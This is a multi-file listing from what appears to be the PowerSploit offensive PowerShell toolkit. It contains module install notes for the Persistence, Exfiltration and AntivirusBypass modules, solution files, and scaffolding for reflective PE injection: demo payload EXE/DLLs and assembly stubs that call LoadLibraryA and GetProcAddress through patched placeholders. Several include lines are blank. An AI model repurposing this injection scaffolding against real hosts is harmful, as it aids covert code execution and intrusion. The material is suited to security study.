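 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | // NOTE(review): the three header names below were lost when this listing was
13 | // extracted (angle-bracket targets stripped); recover them from the repo.
14 | #include 
15 | #include 
16 | #include 
17 | 
18 | 
19 | 
20 | // TODO: reference additional headers your program requires here
21 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
 1 | // DemoExe.cpp : Defines the entry point for the console application.
 2 | //
 3 | // Demo payload for Invoke-ReflectivePEInjection (release /MD CRT): prints
 4 | // argc and each argv entry so a test can confirm the reflective loader
 5 | // passed the command line through.
 6 | #include "stdafx.h"
 7 | // NOTE(review): the header name on the next line was lost in extraction
 8 | // (angle-bracket target stripped); recover it from the repo.
 9 | #include 
10 | 
11 | using namespace std;
12 | 
13 | int _tmain(int argc, _TCHAR* argv[])
14 | {
15 |     printf("Exe loaded! Printing argc and argv\n\n");
16 | 
17 |     printf("Argc: %d\n", argc);
18 |     // %p for a pointer: the original %d passed argv as a 32-bit int, which
19 |     // is undefined behaviour and truncates the address on x64 builds.
20 |     printf("ArgvAddress: %p\n", (void*)argv);
21 | 
22 |     // _tprintf/_T keep the format string and the argument in the same
23 |     // character width whether the project builds as Unicode (_TCHAR is
24 |     // wchar_t) or MBCS (_TCHAR is char); wprintf(L"%s") was only correct
25 |     // for the Unicode configuration.
26 |     for (int i = 0; i < argc; i++)
27 |     {
28 |         _tprintf(_T("Argv: %s\n"), argv[i]);
29 |     }
30 | 
31 |     printf("Exiting exe\n");
32 | 
33 |     return 0;
34 | }
35 | 
36 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | 
 3 | global _start
 4 | 
 5 | ; Loads one DLL by name via LoadLibraryA and stores the returned HMODULE
 6 | ; where the PowerShell script can read it. The 0x4141414141414141 qwords
 7 | ; are placeholders the script patches; it carries the assembled bytes, so
 8 | ; re-assemble and update it if the layout here changes.
 9 | _start:
10 |     ; Save rsp and setup stack for function call: 0x20 bytes of shadow
11 |     ; space for the callee, then 64-byte alignment
12 |     push rbx
13 |     mov rbx, rsp
14 |     sub rsp, 0x20
15 |     and sp, 0xffc0
16 | 
17 |     ; Call LoadLibraryA(lpLibFileName) - argument in rcx
18 |     mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS
19 |     mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
20 |     call rdx
21 | 
22 |     mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
23 |     mov [rdx], rax
24 | 
25 |     ; Fix stack
26 |     mov rsp, rbx
27 |     pop rbx
28 |     ret
29 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
 1 | // DemoExe.cpp : Defines the entry point for the console application.
 2 | //
 3 | // Demo payload for Invoke-ReflectivePEInjection (debug /MDd CRT): prints
 4 | // argc and each argv entry so a test can confirm the reflective loader
 5 | // passed the command line through.
 6 | #include "stdafx.h"
 7 | // NOTE(review): the header name on the next line was lost in extraction
 8 | // (angle-bracket target stripped); recover it from the repo.
 9 | #include 
10 | 
11 | using namespace std;
12 | 
13 | int _tmain(int argc, _TCHAR* argv[])
14 | {
15 |     printf("Exe loaded! Printing argc and argv\n\n");
16 | 
17 |     printf("Argc: %d\n", argc);
18 |     // %p for a pointer: the original %d passed argv as a 32-bit int, which
19 |     // is undefined behaviour and truncates the address on x64 builds.
20 |     printf("ArgvAddress: %p\n", (void*)argv);
21 | 
22 |     // _tprintf/_T keep the format string and the argument in the same
23 |     // character width whether the project builds as Unicode (_TCHAR is
24 |     // wchar_t) or MBCS (_TCHAR is char); wprintf(L"%s") was only correct
25 |     // for the Unicode configuration.
26 |     for (int i = 0; i < argc; i++)
27 |     {
28 |         _tprintf(_T("Argv: %s\n"), argv[i]);
29 |     }
30 | 
31 |     printf("Exiting exe\n");
32 | 
33 |     return 0;
34 | }
35 | 
36 | 
--------------------------------------------------------------------------------
/Persistence/Usage.md:
--------------------------------------------------------------------------------
 1 | To install this module, drop the entire Persistence folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 2 | 
 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" (writing there requires administrative rights and makes the module available to every account on the host)
 5 | 
 6 | To use the module, type `Import-Module Persistence`
 7 | 
 8 | To see the commands imported, type `Get-Command -Module Persistence`
 9 | 
10 | For help on each individual command, Get-Help is your friend.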
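--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | // NOTE(review): the five header names below were lost when this listing was
13 | // extracted (angle-bracket targets stripped); recover them from the repo.
14 | #include 
15 | #include 
16 | #include 
17 | #include 
18 | #include 
19 | 
20 | 
21 | 
22 | // TODO: reference additional headers your program requires here
23 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
 1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
 2 | //
 3 | 
 4 | #include "stdafx.h"
 5 | 
 6 | using namespace std;
 7 | 
 8 | extern "C" __declspec( dllexport ) void VoidFunc();
 9 | 
10 | 
11 | // Demo export called by the reflective loader inside the remote process.
12 | // It has no way to return a result, so it leaves a marker file at a
13 | // hard-coded path: c:\ReflectiveLoaderTest\DllVoidFunction.txt. That file
14 | // (and directory) is an artefact on the target host - clean it up after a
15 | // test, and expect it to be missing when the injected process cannot
16 | // create directories under C:\ (typically any non-admin process).
17 | extern "C" __declspec( dllexport ) void VoidFunc()
18 | {
19 |     // _mkdir failing because the directory already exists is fine; any
20 |     // other failure shows up as the open below failing, which is checked.
21 |     _mkdir("c:\\ReflectiveLoaderTest");
22 |     ofstream myfile("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt");
23 |     if (!myfile.is_open())
24 |     {
25 |         // Original code wrote into a failed stream (a silent no-op); make
26 |         // the failure explicit rather than pretend the marker was written.
27 |         return;
28 |     }
29 |     myfile << "Dll Void function successfully called.\n";
30 |     myfile.close();
31 | }
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | // NOTE(review): the five header names below were lost when this listing was
13 | // extracted (angle-bracket targets stripped). DemoDLL_RemoteProcess.cpp uses
14 | // ofstream and _mkdir, so <fstream> and <direct.h> must be among them; the
15 | // comment above implies <windows.h>. Recover the exact list from the repo.
16 | #include 
17 | #include 
18 | #include 
19 | #include 
20 | #include 
21 | 
22 | 
23 | // TODO: reference additional headers your program requires here
24 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | 
 3 | global _start
 4 | 
 5 | ; Resolves one export via GetProcAddress(hModule, lpProcName) and stores the
 6 | ; result where the PowerShell script can read it. The 0x41414141 words are
 7 | ; placeholders the script patches; it carries the assembled bytes, so
 8 | ; re-assemble and update it if the layout here changes.
 9 | _start:
10 |     ; Save state of ebx and stack
11 |     push ebx
12 |     mov ebx, esp
13 | 
14 |     ; Align stack
15 |     and esp, 0xffffffc0
16 | 
17 |     ; Call GetProcAddress - stdcall, so lpProcName is pushed before hModule
18 |     mov eax, 0x41414141 ; DllHandle, supplied by PS
19 |     mov ecx, 0x41414141 ; Function name, supplied by PS
20 |     push ecx
21 |     push eax
22 |     mov eax, 0x41414141 ; GetProcAddress address, supplied by PS
23 |     call eax
24 | 
25 |     ; Write GetProcAddress return value to an address supplied by PS
26 |     mov ecx, 0x41414141 ; Address supplied by PS
27 |     mov [ecx], eax
28 | 
29 |     ; Fix stack
30 |     mov esp, ebx
31 |     pop ebx
32 |     ret
33 | 
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h" // duplicate of line 8; harmless because targetver.h is #pragma once
13 | // NOTE(review): the nine header names below were lost when this listing was
14 | // extracted (angle-bracket targets stripped); recover them from the repo.
15 | #include 
16 | #include 
17 | #include 
18 | #include 
19 | #include 
20 | #include 
21 | #include 
22 | #include 
23 | #include 
24 | 
25 | 
26 | 
27 | // TODO: reference additional headers your program requires here
28 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | 
 3 | global _start
 4 | 
 5 | ; x64 twin of x86/GetProcAddress.asm: GetProcAddress(hModule, lpProcName)
 6 | ; with the result stored to a PowerShell-supplied buffer. The
 7 | ; 0x4141414141414141 qwords are placeholders the script patches; it carries
 8 | ; the assembled bytes, so re-assemble and update it if the layout changes.
 9 | _start:
10 |     ; Save state of rbx and stack
11 |     push rbx
12 |     mov rbx, rsp
13 | 
14 |     ; Set up stack for function call to GetProcAddress: 0x20 bytes of shadow
15 |     ; space for the callee, then 64-byte alignment
16 |     sub rsp, 0x20
17 |     and sp, 0xffc0
18 | 
19 |     ; Call GetProcAddress - hModule in rcx, lpProcName in rdx
20 |     mov rcx, 0x4141414141414141 ; DllHandle, set by PS
21 |     mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS
22 |     mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
23 |     call rax
24 | 
25 |     ; Store the result
26 |     mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS
27 |     mov [rcx], rax
28 | 
29 |     ; Restore stack
30 |     mov rsp, rbx
31 |     pop rbx
32 |     ret
33 | 
--------------------------------------------------------------------------------
/Recon/Usage.md:
--------------------------------------------------------------------------------
 1 | To install this module, drop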
the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Recon` 7 | 8 | To see the commands imported, type `Get-Command -Module Recon` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /PETools/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire PETools folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module PETools` 7 | 8 | To see the commands imported, type `Get-Command -Module PETools` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. 
-------------------------------------------------------------------------------- /CodeExecution/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module CodeExecution` 7 | 8 | To see the commands imported, type `Get-Command -Module CodeExecution` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /Exfiltration/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Exfiltration` 7 | 8 | To see the commands imported, type `Get-Command -Module Exfiltration` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. 
-------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | using namespace std; 5 | 6 | BOOL APIENTRY DllMain( HMODULE hModule, 7 | DWORD ul_reason_for_call, 8 | LPVOID lpReserved 9 | ) 10 | { 11 | ofstream myfile; 12 | 13 | switch (ul_reason_for_call) 14 | { 15 | case DLL_PROCESS_ATTACH: 16 | _mkdir("c:\\ReflectiveLoaderTest"); 17 | myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt"); 18 | myfile << "DllMain successfully called.\n"; 19 | myfile.close(); 20 | break; 21 | case DLL_THREAD_ATTACH: 22 | case DLL_THREAD_DETACH: 23 | case DLL_PROCESS_DETACH: 24 | break; 25 | } 26 | return TRUE; 27 | } 28 | 29 | -------------------------------------------------------------------------------- /AntivirusBypass/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module AntivirusBypass` 7 | 8 | To see the commands imported, type `Get-Command -Module AntivirusBypass` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. 
-------------------------------------------------------------------------------- /ReverseEngineering/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire ReverseEngineering folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module ReverseEngineering` 7 | 8 | To see the commands imported, type `Get-Command -Module ReverseEngineering` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /ScriptModification/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module ScriptModification` 7 | 8 | To see the commands imported, type `Get-Command -Module ScriptModification` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. 
Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h: -------------------------------------------------------------------------------- 1 | // The following ifdef block is the standard way of creating macros which make exporting 2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS 3 | // symbol defined on the command line. This symbol should not be defined on any project 4 | // that uses this DLL. This way any other project whose source files include this file see 5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols 6 | // defined with this macro as being exported. 7 | #ifdef DEMODLL_EXPORTS 8 | #define DEMODLL_API __declspec(dllexport) 9 | #else 10 | #define DEMODLL_API __declspec(dllimport) 11 | #endif 12 | 13 | using namespace std; 14 | 15 | extern "C" __declspec( dllexport ) char* StringFunc(); 16 | extern "C" __declspec( dllexport ) void VoidFunc(); 17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc(); -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/NTFS.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NTFS include files 3 | * 4 | * Copyright(C) 2010 cyb70289 5 | * 6 | * This program/include file is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU General Public License as published 8 | * by the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program/include file is distributed in the hope that it will be 12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 14 | * GNU General Public License for more details. 15 | */ 16 | 17 | #ifndef __NTFS_H_CYB70289 18 | #define __NTFS_H_CYB70289 19 | 20 | #pragma pack(8) 21 | 22 | #include "NTFS_Common.h" 23 | #include "NTFS_FileRecord.h" 24 | #include "NTFS_Attribute.h" 25 | 26 | #pragma pack() 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NTFS include files 3 | * 4 | * Copyright(C) 2010 cyb70289 5 | * 6 | * This program/include file is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU General Public License as published 8 | * by the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program/include file is distributed in the hope that it will be 12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 
15 | */ 16 | 17 | #ifndef __NTFS_H_CYB70289 18 | #define __NTFS_H_CYB70289 19 | 20 | #pragma pack(8) 21 | 22 | #include "NTFS_Common.h" 23 | #include "NTFS_FileRecord.h" 24 | #include "NTFS_Attribute.h" 25 | 26 | #pragma pack() 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32 14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32 15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /Capstone/README: -------------------------------------------------------------------------------- 1 | This module has three dependencies: 2 | * lib\x86\libcapstone.dll (the 32-bit unmanaged Capstone library) 3 | * lib\x64\libcapstone.dll (the 64-bit unmanaged Capstone library) 4 | * lib\capstone.dll (the managed C# bindings to the Capstone Framework) 5 | 6 | To install this module, drop the entire Capstone folder into one of your module 
directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 7 | 8 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 9 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 10 | 11 | To use the module, type `Import-Module Capstone` 12 | 13 | To see the commands imported, type `Get-Command -Module Capstone` 14 | 15 | For help on each individual command, Get-Help is your friend. 16 | 17 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /Persistence/Persistence.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Persistence.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Persistence Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # Cmdlets to export from this module 28 | CmdletsToExport = '*' 29 | 30 | # List of all modules packaged with this module. 
31 | ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}) 32 | 33 | # List of all files packaged with this module 34 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOptions.ps1', 35 | 'New-UserPersistenceOptions.ps1', 'Usage.md' 36 | 37 | } 38 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | // dllmain.cpp : Defines the entry point for the DLL application. 
19 | #include "stdafx.h" 20 | 21 | BOOL APIENTRY DllMain( HMODULE hModule, 22 | DWORD ul_reason_for_call, 23 | LPVOID lpReserved 24 | ) 25 | { 26 | switch (ul_reason_for_call) 27 | { 28 | case DLL_PROCESS_ATTACH: 29 | case DLL_THREAD_ATTACH: 30 | case DLL_THREAD_DETACH: 31 | case DLL_PROCESS_DETACH: 32 | break; 33 | } 34 | return TRUE; 35 | } 36 | 37 | -------------------------------------------------------------------------------- /PETools/Get-LibSymbols.format.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SymbolTypeView 6 | 7 | COFF.SymbolInfo 8 | 9 | 10 | 11 | 12 | 13 | 14 | SymbolType 15 | 16 | 17 | Module 18 | 19 | 20 | DecoratedName 21 | 22 | 23 | UndecoratedName 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32 16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64 17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64 18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32 19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32 20 | 
{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64 21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32 16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64 17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64 18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32 19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32 20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64 21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln: 
